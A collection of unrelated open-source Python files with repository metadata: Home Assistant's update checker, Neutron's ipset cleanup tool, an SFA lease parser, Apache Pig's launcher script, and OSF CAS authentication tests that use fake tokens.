from homeassistant.helpers import event
REQUIREMENTS = ['distro==1.0.4']
_LOGGER = logging.getLogger(__name__)
ATTR_RELEASE_NOTES = 'release_notes'
CONF_REPORTING = 'reporting'
CONF_COMPONENT_REPORTING = 'include_used_components'
DOMAIN = 'updater'
ENTITY_ID = 'updater.updater'
UPDATER_URL = 'https://updater.home-assistant.io/'
UPDATER_UUID_FILE = '.uuid'
CONFIG_SCHEMA = vol.Schema({DOMAIN: {
vol.Optional(CONF_REPORTING, default=True): cv.boolean,
vol.Optional(CONF_COMPONENT_REPORTING, default=False): cv.boolean,
}}, extra=vol.ALLOW_EXTRA)
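# Illustrative configuration.yaml entry accepted by CONFIG_SCHEMA above
# (both keys are optional; the values shown are the schema defaults):
#
#   updater:
#     reporting: true
#     include_used_components: false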
RESPONSE_SCHEMA = vol.Schema({
vol.Required('version'): str,
vol.Required('release-notes'): cv.url,
})
def _create_uuid(hass, filename=UPDATER_UUID_FILE):
"""Create UUID and save it in a file."""
with open(hass.config.path(filename), 'w') as fptr:
_uuid = uuid.uuid4().hex
fptr.write(json.dumps({'uuid': _uuid}))
return _uuid
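# The file written above (and read by _load_uuid below) holds a single JSON
# object, for example {"uuid": "0123456789abcdef0123456789abcdef"}; the hex
# value shown here is only illustrative.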
def _load_uuid(hass, filename=UPDATER_UUID_FILE):
"""Load UUID from a file or return None."""
try:
with open(hass.config.path(filename)) as fptr:
jsonf = json.loads(fptr.read())
return uuid.UUID(jsonf['uuid'], version=4).hex
except (ValueError, AttributeError):
return None
except FileNotFoundError:
return _create_uuid(hass, filename)
@asyncio.coroutine
def async_setup(hass, config):
"""Set up the updater component."""
if 'dev' in CURRENT_VERSION:
# This component only makes sense in release versions
_LOGGER.warning("Running on 'dev', only analytics will be submitted")
config = config.get(DOMAIN, {})
if config.get(CONF_REPORTING):
huuid = yield from hass.async_add_job(_load_uuid, hass)
else:
huuid = None
include_components = config.get(CONF_COMPONENT_REPORTING)
@asyncio.coroutine
def check_new_version(now):
"""Check if a new version is available and report if one is."""
result = yield from get_newest_version(hass, huuid,
include_components)
if result is None:
return
newest, releasenotes = result
if newest is None or 'dev' in CURRENT_VERSION:
return
if StrictVersion(newest) > StrictVersion(CURRENT_VERSION):
_LOGGER.info("The latest available version is %s", newest)
hass.states.async_set(
ENTITY_ID, newest, {ATTR_FRIENDLY_NAME: 'Update Available',
ATTR_RELEASE_NOTES: releasenotes}
)
elif StrictVersion(newest) == StrictVersion(CURRENT_VERSION):
_LOGGER.info(
"You are on the latest version (%s) of Home Assistant", newest)
# Update daily, start 1 hour after startup
_dt = dt_util.utcnow() + timedelta(hours=1)
event.async_track_utc_time_change(
hass, check_new_version,
hour=_dt.hour, minute=_dt.minute, second=_dt.second)
return True
@asyncio.coroutine
def get_system_info(hass, include_components):
"""Return info about the system."""
info_object = {
'arch': platform.machine(),
'dev': 'dev' in CURRENT_VERSION,
'docker': False,
'os_name': platform.system(),
'python_version': platform.python_version(),
'timezone': dt_util.DEFAULT_TIME_ZONE.zone,
'version': CURRENT_VERSION,
'virtualenv': os.environ.get('VIRTUAL_ENV') is not None,
}
if include_components:
info_object['components'] = list(hass.config.components)
if platform.system() == 'Windows':
info_object['os_version'] = platform.win32_ver()[0]
elif platform.system() == 'Darwin':
info_object['os_version'] = platform.mac_ver()[0]
elif platform.system() == 'FreeBSD':
info_object['os_version'] = platform.release()
elif platform.system() == 'Linux':
import distro
linux_dist = yield from hass.async_add_job(
distro.linux_distribution, False)
info_object['distribution'] = linux_dist[0]
info_object['os_version'] = linux_dist[1]
info_object['docker'] = os.path.isfile('/.dockerenv')
return info_object
@asyncio.coroutine
def get_newest_version(hass, huuid, include_components):
"""Get the newest Home Assistant version."""
if huuid:
info_object = yield from get_system_info(hass, include_components)
info_object['huuid'] = huuid
else:
info_object = {}
session = async_get_clientsession(hass)
try:
with async_timeout.timeout(5, loop=hass.loop):
req = yield from session.post(UPDATER_URL, json=info_object)
_LOGGER.info(("Submitted analytics to Home Assistant servers. "
"Information submitted includes %s"), info_object)
except (asyncio.TimeoutError, aiohttp.ClientError):
_LOGGER.error("Could not contact Home Assistant Update to check "
"for updates")
return None
try:
res = yield from req.json()
except ValueError:
_LOGGER.error("Received invalid JSON from Home Assistant Update")
return None
try:
res = RESPONSE_SCHEMA(res)
return (res['version'], res['release-notes'])
except vol.Invalid:
_LOGGER.error('Got unexpected response: %s', res)
return None
|
alexmogavero/home-assistant
|
homeassistant/components/updater.py
|
Python
|
apache-2.0
| 6,075
|
# Copyright (c) 2015 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from neutron._i18n import _LE, _LI
from neutron.agent.linux import utils
from neutron.common import config
from neutron.conf.agent import cmd as command
LOG = logging.getLogger(__name__)
def setup_conf():
"""Setup the cfg for the clean up utility.
Use separate setup_conf for the utility because there are many options
from the main config that do not apply during clean-up.
"""
conf = cfg.CONF
command.register_cmd_opts(command.ip_opts, conf)
return conf
def remove_iptables_reference(ipset):
# Remove any iptables reference to this IPset
cmd = ['iptables-save'] if 'IPv4' in ipset else ['ip6tables-save']
iptables_save = utils.execute(cmd, run_as_root=True)
if ipset in iptables_save:
cmd = ['iptables'] if 'IPv4' in ipset else ['ip6tables']
LOG.info(_LI("Removing iptables rule for IPset: %s"), ipset)
for rule in iptables_save.splitlines():
if '--match-set %s ' % ipset in rule and rule.startswith('-A'):
# change to delete
params = rule.split()
params[0] = '-D'
try:
utils.execute(cmd + params, run_as_root=True)
except Exception:
LOG.exception(_LE('Error, unable to remove iptables rule '
'for IPset: %s'), ipset)
def destroy_ipset(conf, ipset):
# If there is an iptables reference and we don't remove it, the
# IPset removal will fail below
if conf.force:
remove_iptables_reference(ipset)
LOG.info(_LI("Destroying IPset: %s"), ipset)
cmd = ['ipset', 'destroy', ipset]
try:
utils.execute(cmd, run_as_root=True)
except Exception:
LOG.exception(_LE('Error, unable to destroy IPset: %s'), ipset)
def cleanup_ipsets(conf):
# Identify ipsets for destruction.
LOG.info(_LI("Destroying IPsets with prefix: %s"), conf.prefix)
cmd = ['ipset', '-L', '-n']
ipsets = utils.execute(cmd, run_as_root=True)
for ipset in ipsets.split('\n'):
if conf.allsets or ipset.startswith(conf.prefix):
destroy_ipset(conf, ipset)
LOG.info(_LI("IPset cleanup completed successfully"))
def main():
"""Main method for cleaning up IPsets.
The utility is designed to clean-up after the forced or unexpected
termination of Neutron agents.
The --allsets flag should only be used as part of the cleanup of a devstack
installation as it will blindly destroy all IPsets.
"""
conf = setup_conf()
conf()
config.setup_logging()
cleanup_ipsets(conf)
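# Illustrative invocation, assuming the usual console-script entry point for
# this module and the options registered via command.ip_opts (--prefix,
# --allsets, --force); adjust paths and names for your deployment:
#
#   neutron-ipset-cleanup --config-file /etc/neutron/neutron.conf --force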
|
sebrandon1/neutron
|
neutron/cmd/ipset_cleanup.py
|
Python
|
apache-2.0
| 3,313
|
from openflow.optin_manager.sfa.util.sfalogging import logger
from openflow.optin_manager.sfa.util.xml import XpathFilter
from openflow.optin_manager.sfa.util.xrn import Xrn
from openflow.optin_manager.sfa.rspecs.elements.element import Element
from openflow.optin_manager.sfa.rspecs.elements.node import Node
from openflow.optin_manager.sfa.rspecs.elements.sliver import Sliver
from openflow.optin_manager.sfa.rspecs.elements.location import Location
from openflow.optin_manager.sfa.rspecs.elements.hardware_type import HardwareType
from openflow.optin_manager.sfa.rspecs.elements.disk_image import DiskImage
from openflow.optin_manager.sfa.rspecs.elements.interface import Interface
from openflow.optin_manager.sfa.rspecs.elements.bwlimit import BWlimit
from openflow.optin_manager.sfa.rspecs.elements.pltag import PLTag
from openflow.optin_manager.sfa.rspecs.elements.versions.sfav1Sliver import SFAv1Sliver
from openflow.optin_manager.sfa.rspecs.elements.versions.sfav1PLTag import SFAv1PLTag
from openflow.optin_manager.sfa.rspecs.elements.versions.pgv2Services import PGv2Services
from openflow.optin_manager.sfa.rspecs.elements.lease import Lease
from sfa.planetlab.plxrn import xrn_to_hostname
class SFAv1Lease:
@staticmethod
def add_leases(xml, leases):
network_elems = xml.xpath('//network')
if len(network_elems) > 0:
network_elem = network_elems[0]
elif len(leases) > 0:
network_urn = Xrn(leases[0]['component_id']).get_authority_urn().split(':')[0]
network_elem = xml.add_element('network', name = network_urn)
else:
network_elem = xml
# group the leases by slice and timeslots
grouped_leases = []
while leases:
slice_id = leases[0]['slice_id']
start_time = leases[0]['start_time']
duration = leases[0]['duration']
group = []
for lease in leases:
if slice_id == lease['slice_id'] and start_time == lease['start_time'] and duration == lease['duration']:
group.append(lease)
grouped_leases.append(group)
for lease1 in group:
leases.remove(lease1)
lease_elems = []
for lease in grouped_leases:
#lease_fields = ['lease_id', 'component_id', 'slice_id', 'start_time', 'duration']
lease_fields = ['slice_id', 'start_time', 'duration']
lease_elem = network_elem.add_instance('lease', lease[0], lease_fields)
lease_elems.append(lease_elem)
# add nodes of this lease
for node in lease:
lease_elem.add_instance('node', node, ['component_id'])
# lease_elems = []
# for lease in leases:
# lease_fields = ['lease_id', 'component_id', 'slice_id', 'start_time', 'duration']
# lease_elem = network_elem.add_instance('lease', lease, lease_fields)
# lease_elems.append(lease_elem)
@staticmethod
def get_leases(xml, filter={}):
xpath = '//lease%s | //default:lease%s' % (XpathFilter.xpath(filter), XpathFilter.xpath(filter))
lease_elems = xml.xpath(xpath)
return SFAv1Lease.get_lease_objs(lease_elems)
@staticmethod
def get_lease_objs(lease_elems):
leases = []
for lease_elem in lease_elems:
#get nodes
node_elems = lease_elem.xpath('./default:node | ./node')
for node_elem in node_elems:
lease = Lease(lease_elem.attrib, lease_elem)
lease['slice_id'] = lease_elem.attrib['slice_id']
lease['start_time'] = lease_elem.attrib['start_time']
lease['duration'] = lease_elem.attrib['duration']
lease['component_id'] = node_elem.attrib['component_id']
leases.append(lease)
return leases
# leases = []
# for lease_elem in lease_elems:
# lease = Lease(lease_elem.attrib, lease_elem)
# if lease.get('lease_id'):
# lease['lease_id'] = lease_elem.attrib['lease_id']
# lease['component_id'] = lease_elem.attrib['component_id']
# lease['slice_id'] = lease_elem.attrib['slice_id']
# lease['start_time'] = lease_elem.attrib['start_time']
# lease['duration'] = lease_elem.attrib['duration']
# leases.append(lease)
# return leases
|
dana-i2cat/felix
|
optin_manager/src/python/openflow/optin_manager/sfa/rspecs/elements/versions/sfav1Lease.py
|
Python
|
apache-2.0
| 4,499
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# 'License'); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# The Pig command script
#
# Environment Variables
#
# JAVA_HOME The java implementation to use. Overrides JAVA_HOME.
#
# PIG_CLASSPATH Extra Java CLASSPATH entries.
#
# HADOOP_HOME/HADOOP_PREFIX Environment HADOOP_HOME/HADOOP_PREFIX(0.20.205)
#
# HADOOP_CONF_DIR Hadoop conf dir
#
# PIG_HEAPSIZE The maximum amount of heap to use, in MB.
# Default is 1000.
#
# PIG_OPTS Extra Java runtime options.
#
# PIG_CONF_DIR Alternate conf dir. Default is ${PIG_HOME}/conf.
#
# HBASE_CONF_DIR - Optionally, the HBase configuration to run against
# when using HBaseStorage
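# Illustrative invocation of this wrapper (flags not handled below, such as
# the script name, are passed straight through to Pig; the heap size and
# script name here are made up):
#
#   PIG_HEAPSIZE=2048 python pig.py -useHCatalog myscript.pig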
import sys
import os
import glob
import subprocess
debug = False
restArgs = []
includeHCatalog = False
additionalJars = ""
for arg in sys.argv:
if arg == __file__:
continue
if arg == "-secretDebugCmd":
debug = True
elif arg == "-useHCatalog":
includeHCatalog = True
elif arg.split("=")[0] == "-D.pig.additional.jars":
if includeHCatalog == True:
additionalJars = arg.split("=")[1]
else:
restArgs.append(arg)
else:
restArgs.append(arg)
# Determine our absolute path, resolving any symbolic links
this = os.path.realpath(sys.argv[0])
bindir = os.path.dirname(this) + os.path.sep
# the root of the pig installation
os.environ['PIG_HOME'] = os.path.join(bindir, os.path.pardir)
if 'PIG_CONF_DIR' not in os.environ:
pigPropertiesPath = os.path.join(os.environ['PIG_HOME'], 'conf', 'pig.properties')
if os.path.exists(pigPropertiesPath):
try:
fhdl = open(pigPropertiesPath, 'r')
fhdl.close()
os.environ['PIG_CONF_DIR'] = os.path.join(os.environ['PIG_HOME'], 'conf')
except:
# in the small window after checking for file, if file is deleted,
# we should fail if we hit an exception
sys.exit('Failed to access file %s' % pigPropertiesPath)
elif os.path.exists(os.path.join(os.path.sep, 'etc', 'pig')):
os.environ['PIG_CONF_DIR'] = os.path.join(os.path.sep, 'etc', 'pig')
else:
sys.exit('Cannot determine PIG_CONF_DIR. Please set it to the directory containing pig.properties')
# Hack to get to read a shell script and the changes to the environment it makes
# This is potentially bad because we could execute arbitrary code
try:
importScript = os.path.join(os.environ['PIG_CONF_DIR'], 'runPigEnv.sh')
fd = open(importScript, 'w')
fd.write(". " + os.path.join(os.environ['PIG_CONF_DIR'], 'pig-env.sh'))
fd.write("\n")
fd.write("set")
fd.close()
outFd = open(os.path.join(os.environ['PIG_CONF_DIR'], 'pigStartPython.out'), 'w')
output = subprocess.Popen(importScript, shell=True, stdout=outFd)
output.wait()
outFd.close()
outFd = open(os.path.join(os.environ['PIG_CONF_DIR'], 'pigStartPython.out'), 'r')
for line in outFd:
        if len(line.split(' ')) > 1:
continue
envSplit = line.split('=')
if len(envSplit) == 2:
            os.environ[envSplit[0]] = envSplit[1].strip()
outFd.close()
except:
pass
# functionality similar to the shell script. This executes a pig script instead
try:
    if os.path.exists(os.path.join(os.environ['PIG_CONF_DIR'], 'pig.conf')):
pigConf = os.path.join(os.environ['PIG_CONF_DIR'], 'pig.conf')
__import__(pigConf)
except:
pass
if 'JAVA_HOME' not in os.environ:
sys.exit('Error: JAVA_HOME is not set')
if 'HADOOP_HOME' not in os.environ:
os.environ['HADOOP_HOME'] = os.path.sep + 'usr'
java = os.path.join(os.environ['JAVA_HOME'], 'bin', 'java')
javaHeapMax = "-Xmx1000m"
if 'PIG_HEAPSIZE' in os.environ:
javaHeapMax = '-Xmx' + os.environ['PIG_HEAPSIZE'] + 'm'
classpath = os.environ['PIG_CONF_DIR']
classpath += os.pathsep + os.path.join(os.environ['JAVA_HOME'], 'lib', 'tools.jar')
if 'PIG_CLASSPATH' in os.environ:
classpath += os.pathsep + os.environ['PIG_CLASSPATH']
if 'HADOOP_CONF_DIR' in os.environ:
classpath += os.pathsep + os.environ['HADOOP_CONF_DIR']
pigLibJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "lib", "*.jar"))
for jar in pigLibJars:
classpath += os.pathsep + jar
######### if hcatalog is to be included, add hcatalog and its required jars
if includeHCatalog == True:
# adding the hive jars required by hcatalog
hiveJarLoc = ""
if 'HIVE_HOME' in os.environ:
hiveJarLoc = os.path.join(os.environ['HIVE_HOME'], "lib")
else:
        if os.path.exists(os.path.join(os.path.sep + 'usr', 'lib', 'hive')):
            hiveJarLoc = os.path.join(os.path.sep + 'usr', 'lib', 'hive', 'lib')
else:
sys.exit("Please initialize HIVE_HOME to the hive install directory")
allHiveJars = ["hive-metastore-*.jar", "libthrift-*.jar", "hive-exec-*.jar", "libfb303-*.jar", "jdo2-api-*-ec.jar", "slf4j-api-*.jar", "hive-hbase-handler-*.jar"]
for jarName in allHiveJars:
jar = glob.glob(os.path.join(hiveJarLoc, jarName))
        if (len(jar) != 0) and (os.path.exists(jar[0])):
classpath += os.pathsep + jar[0]
else:
sys.exit("Failed to find the jar %s" % os.path.join(hiveJarLoc, jarName))
# done with adding the hive jars required by hcatalog
# adding the hcat jars
hcatHome = ""
if 'HCAT_HOME' in os.environ:
hcatHome = os.environ['HCAT_HOME']
else:
if os.path.exists(os.path.join(os.path.sep + "usr", "lib", "hcatalog")):
hcatHome = os.path.join(os.path.sep + "usr", "lib", "hcatalog")
else:
sys.exit("Please initialize HCAT_HOME to the hcatalog install directory")
hcatJars = glob.glob(os.path.join(hcatHome, "share", "hcatalog", "hcatalog-*.jar"))
found = False
for hcatJar in hcatJars:
if hcatJar.find("server") != -1:
found = True
classpath += os.pathsep + hcatJar
break
if found == False:
sys.exit("Failed to find the hcatalog server jar in %s" % (os.path.join(hcatHome, "share", "hcatalog")))
hcatHBaseJar = glob.glob(os.path.join(hcatHome, "lib", "hbase-storage-handler-*.jar"))
try:
classpath += os.pathsep + hcatHBaseJar[0]
except:
pass
# done with adding the hcat jars
# now also add the additional jars passed through the command line
classpath += os.pathsep + additionalJars
# done adding the additional jars from the command line
######### done with adding hcatalog and related jars
######### Add the jython jars to classpath
jythonJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "lib", "jython*.jar"))
if len(jythonJars) == 1:
classpath += os.pathsep + jythonJars[0]
else:
jythonJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "build", "ivy", "lib", "Pig", "jython*.jar"))
if len(jythonJars) == 1:
classpath += os.pathsep + jythonJars[0]
######### Done adding the jython jars to classpath
######### Add the jruby jars to classpath
jrubyJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "lib", "jruby-complete-*.jar"))
if len(jrubyJars) == 1:
classpath += os.pathsep + jrubyJars[0]
else:
jrubyJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "build", "ivy", "lib", "Pig", "jruby-complete-*.jar"))
if len(jrubyJars) == 1:
classpath += os.pathsep + jrubyJars[0]
pigJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "share", "pig", "lib", "*.jar"))
for jar in pigJars:
classpath += os.pathsep + jar
######### Done adding jruby jars to classpath
######### Add hadoop and hbase conf directories
hadoopConfDir = os.path.join(os.environ['PIG_HOME'], "etc", "hadoop")
if os.path.exists(hadoopConfDir):
classpath += os.pathsep + hadoopConfDir
if 'HBASE_CONF_DIR' in os.environ:
classpath += os.pathsep + os.environ['HBASE_CONF_DIR']
else:
hbaseConfDir = os.path.join(os.path.sep + "etc", "hbase")
if os.path.exists(hbaseConfDir):
classpath += os.pathsep + hbaseConfDir
######### Done adding hadoop and hbase conf directories
######### Locate and add Zookeeper jars if they exist
zkDir = ""
if 'ZOOKEEPER_HOME' in os.environ:
zkDir = os.environ['ZOOKEEPER_HOME']
else:
zkDir = os.path.join(os.environ['PIG_HOME'], "share", "zookeeper")
if os.path.exists(zkDir):
    zkJars = glob.glob(os.path.join(zkDir, "zookeeper-*.jar"))
for jar in zkJars:
classpath += os.pathsep + jar
######### Done adding zookeeper jars
######### Locate and add hbase jars if they exist
hbaseDir = ""
if 'HBASE_HOME' in os.environ:
hbaseDir = os.environ['HBASE_HOME']
else:
hbaseDir = os.path.join(os.environ['PIG_HOME'], "share", "hbase")
if os.path.exists(hbaseDir):
hbaseJars = glob.glob(os.path.join(hbaseDir, "hbase-*.jar"))
for jar in hbaseJars:
classpath += os.pathsep + jar
######### Done adding hbase jars
######### set the log directory and logfile if they don't exist
if 'PIG_LOG_DIR' not in os.environ:
    pigLogDir = os.path.join(os.environ['PIG_HOME'], "logs")
else:
    pigLogDir = os.environ['PIG_LOG_DIR']
if 'PIG_LOGFILE' not in os.environ:
    pigLogFile = 'pid.log'
else:
    pigLogFile = os.environ['PIG_LOGFILE']
######### Done setting the logging directory and logfile
pigOpts = ""
try:
pigOpts = os.environ['PIG_OPTS']
except:
pass
pigOpts += " -Dpig.log.dir=" + pigLogDir
pigOpts += " -Dpig.log.file=" + pigLogFile
pigOpts += " -Dpig.home.dir=" + os.environ['PIG_HOME']
pigJar = ""
hadoopBin = ""
print "HADOOP_HOME: %s" % os.path.expandvars(os.environ['HADOOP_HOME'])
print "HADOOP_PREFIX: %s" % os.path.expandvars(os.environ['HADOOP_PREFIX'])
if (os.environ.get('HADOOP_PREFIX') is not None):
print "Found a hadoop prefix"
hadoopPrefixPath = os.path.expandvars(os.environ['HADOOP_PREFIX'])
if os.path.exists(os.path.join(hadoopPrefixPath, "bin", "hadoop")):
hadoopBin = os.path.join(hadoopPrefixPath, "bin", "hadoop")
if (os.environ.get('HADOOP_HOME') is not None):
print "Found a hadoop home"
hadoopHomePath = os.path.expandvars(os.environ['HADOOP_HOME'])
print "Hadoop home path: %s" % hadoopHomePath
if os.path.exists(os.path.join(hadoopHomePath, "bin", "hadoop")):
hadoopBin = os.path.join(hadoopHomePath, "bin", "hadoop")
if hadoopBin == "":
if os.path.exists(os.path.join(os.path.sep + "usr", "bin", "hadoop")):
hadoopBin = os.path.join(os.path.sep + "usr", "bin", "hadoop")
if hadoopBin != "":
if debug == True:
print "Find hadoop at %s" % hadoopBin
if os.path.exists(os.path.join(os.environ['PIG_HOME'], "pig-withouthadoop.jar")):
pigJar = os.path.join(os.environ['PIG_HOME'], "pig-withouthadoop.jar")
else:
pigJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "pig-?.*withouthadoop.jar"))
if len(pigJars) == 1:
pigJar = pigJars[0]
elif len(pigJars) > 1:
print "Ambiguity with pig jars found the following jars"
print pigJars
sys.exit("Please remove irrelavant jars fromt %s" % os.path.join(os.environ['PIG_HOME'], "pig-?.*withouthadoop.jar"))
else:
pigJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "share", "pig", "pig-*withouthadoop.jar"))
if len(pigJars) == 1:
pigJar = pigJars[0]
else:
sys.exit("Cannot locate pig-withouthadoop.jar do 'ant jar-withouthadoop', and try again")
if 'HADOOP_CLASSPATH' in os.environ:
os.environ['HADOOP_CLASSPATH'] += os.pathsep + classpath
else:
os.environ['HADOOP_CLASSPATH'] = classpath
if debug == True:
print "dry run:"
print "HADOOP_CLASSPATH: %s" % os.environ['HADOOP_CLASSPATH']
try:
print "HADOOP_OPTS: %s" % os.environ['HADOOP_OPTS']
except:
pass
print "%s jar %s %s" % (hadoopBin, pigJar, ' '.join(restArgs))
else:
cmdLine = hadoopBin + ' jar ' + pigJar + ' ' + ' '.join(restArgs)
subprocess.call(cmdLine, shell=True)
else:
# fall back to use fat pig.jar
if debug == True:
print "Cannot find local hadoop installation, using bundled hadoop 20.2"
if os.path.exists(os.path.join(os.environ['PIG_HOME'], "pig.jar")):
pigJar = os.path.join(os.environ['PIG_HOME'], "pig.jar")
else:
pigJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "pig-?.!(*withouthadoop).jar"))
if len(pigJars) == 1:
pigJar = pigJars[0]
elif len(pigJars) > 1:
print "Ambiguity with pig jars found the following jars"
print pigJars
sys.exit("Please remove irrelavant jars fromt %s" % os.path.join(os.environ['PIG_HOME'], "pig-?.*withouthadoop.jar"))
else:
sys.exit("Cannot locate pig.jar. do 'ant jar' and try again")
classpath += os.pathsep + pigJar
pigClass = "org.apache.pig.Main"
if debug == True:
print "dry runXXX:"
print "%s %s %s -classpath %s %s %s" % (java, javaHeapMax, pigOpts, classpath, pigClass, ' '.join(restArgs))
else:
cmdLine = java + ' ' + javaHeapMax + ' ' + pigOpts
cmdLine += ' ' + '-classpath ' + classpath + ' ' + pigClass + ' ' + ' '.join(restArgs)
subprocess.call(cmdLine, shell=True)
|
siddaartha/spork
|
bin/pig.py
|
Python
|
apache-2.0
| 13,326
|
# -*- coding: utf-8 -*-
import furl
import responses
import mock
from nose.tools import * # flake8: noqa (PEP8 asserts)
import unittest
from framework.auth import cas
from tests.base import OsfTestCase, fake
from osf_tests.factories import UserFactory
def make_successful_response(user):
return cas.CasResponse(
authenticated=True,
user=user._id,
attributes={
'accessToken': fake.md5()
}
)
def make_failure_response():
return cas.CasResponse(
authenticated=False,
user=None,
)
def make_external_response(release=True, unicode=False):
attributes = {
'accessToken': fake.md5(),
}
if release:
attributes.update({
'given-names': fake.first_name() if not unicode else u'нет',
'family-name': fake.last_name() if not unicode else u'Да',
})
return cas.CasResponse(
authenticated=True,
user='OrcidProfile#{}'.format(fake.numerify('####-####-####-####')),
attributes=attributes
)
def generate_external_user_with_resp(service_url, user=True, release=True):
"""
Generate mock user, external credential and cas response for tests.
:param service_url: the service url
:param user: set to `False` if user does not exists
:param release: set to `False` if attributes are not released due to privacy settings
:return: existing user object or new user, valid external credential, valid cas response
"""
cas_resp = make_external_response(release=release)
validated_credentials = cas.validate_external_credential(cas_resp.user)
if user:
user = UserFactory.build()
user.external_identity = {
validated_credentials['provider']: {
validated_credentials['id']: 'VERIFIED'
}
}
user.save()
return user, validated_credentials, cas_resp
else:
user = {
'external_id_provider': validated_credentials['provider'],
'external_id': validated_credentials['id'],
'fullname': '',
'access_token': cas_resp.attributes['accessToken'],
'service_url': service_url,
}
return user, validated_credentials, cas_resp
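# Illustrative use of the helper above (the service URL is a placeholder,
# matching the one used elsewhere in these tests):
#
#   user, credentials, cas_resp = generate_external_user_with_resp(
#       'http://localhost:5000/', user=False, release=True)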
RESPONSE_TEMPLATE = """
<cas:serviceResponse xmlns:cas='http://www.yale.edu/tp/cas'>
<cas:authenticationSuccess>
<cas:user>{user_id}</cas:user>
<cas:attributes>
<cas:isFromNewLogin>true</cas:isFromNewLogin>
<cas:authenticationDate>Tue May 19 02:20:19 UTC 2015</cas:authenticationDate>
<cas:givenName>{given_name}</cas:givenName>
<cas:familyName>{family_name}</cas:familyName>
<cas:longTermAuthenticationRequestTokenUsed>true</cas:longTermAuthenticationRequestTokenUsed>
<cas:accessToken>{access_token}</cas:accessToken>
<cas:username>{username}</cas:username>
</cas:attributes>
</cas:authenticationSuccess>
</cas:serviceResponse>
"""
def make_service_validation_response_body(user, access_token=None):
token = access_token or fake.md5()
return RESPONSE_TEMPLATE.format(
user_id=user._id,
given_name=user.given_name,
family_name=user.family_name,
username=user.username,
access_token=token
)
def test_parse_authorization_header():
token = fake.md5()
valid = 'Bearer {}'.format(token)
assert_equal(cas.parse_auth_header(valid), token)
missing_token = 'Bearer '
with assert_raises(cas.CasTokenError):
cas.parse_auth_header(missing_token)
class TestCASClient(OsfTestCase):
def setUp(self):
OsfTestCase.setUp(self)
self.base_url = 'http://accounts.test.test'
self.client = cas.CasClient(self.base_url)
@responses.activate
def test_service_validate(self):
user = UserFactory()
url = furl.furl(self.base_url)
url.path.segments.extend(('p3', 'serviceValidate',))
service_url = 'http://test.osf.io'
ticket = fake.md5()
body = make_service_validation_response_body(user, ticket)
responses.add(
responses.Response(
responses.GET,
url.url,
body=body,
status=200,
)
)
resp = self.client.service_validate(ticket, service_url)
assert_true(resp.authenticated)
@responses.activate
def test_service_validate_invalid_ticket_raises_error(self):
url = furl.furl(self.base_url)
url.path.segments.extend(('p3', 'serviceValidate',))
service_url = 'http://test.osf.io'
# Return error response
responses.add(
responses.Response(
responses.GET,
url.url,
body='invalid ticket...',
status=500,
)
)
with assert_raises(cas.CasHTTPError):
self.client.service_validate('invalid', service_url)
@responses.activate
def test_profile_invalid_access_token_raises_error(self):
url = furl.furl(self.base_url)
url.path.segments.extend(('oauth2', 'profile',))
responses.add(
responses.Response(
responses.GET,
url.url,
status=500,
)
)
with assert_raises(cas.CasHTTPError):
self.client.profile('invalid-access-token')
@responses.activate
def test_application_token_revocation_succeeds(self):
url = self.client.get_auth_token_revocation_url()
client_id= 'fake_id'
client_secret = 'fake_secret'
responses.add(
responses.Response(
responses.POST,
url,
body={'client_id': client_id,
'client_secret': client_secret},
status=204
)
)
res = self.client.revoke_application_tokens(client_id, client_secret)
assert_equal(res, True)
@responses.activate
def test_application_token_revocation_fails(self):
url = self.client.get_auth_token_revocation_url()
client_id= 'fake_id'
client_secret = 'fake_secret'
responses.add(
responses.Response(
responses.POST,
url,
body={'client_id': client_id,
'client_secret': client_secret},
status=400
)
)
with assert_raises(cas.CasHTTPError):
res = self.client.revoke_application_tokens(client_id, client_secret)
@unittest.skip('finish me')
def test_profile_valid_access_token_returns_cas_response(self):
assert 0
@unittest.skip('finish me')
def test_get_login_url(self):
assert 0
@unittest.skip('finish me')
def test_get_logout_url(self):
assert 0
class TestCASTicketAuthentication(OsfTestCase):
def setUp(self):
OsfTestCase.setUp(self)
self.user = UserFactory()
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_success(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_service_validate.return_value = make_successful_response(self.user)
mock_get_user_from_cas_resp.return_value = (self.user, None, 'authenticate')
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
assert_equal(mock_get_user_from_cas_resp.call_count, 1)
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_failure(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_service_validate.return_value = make_failure_response()
mock_get_user_from_cas_resp.return_value = (None, None, None)
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
assert_equal(mock_get_user_from_cas_resp.call_count, 0)
@mock.patch('framework.auth.cas.CasClient.service_validate')
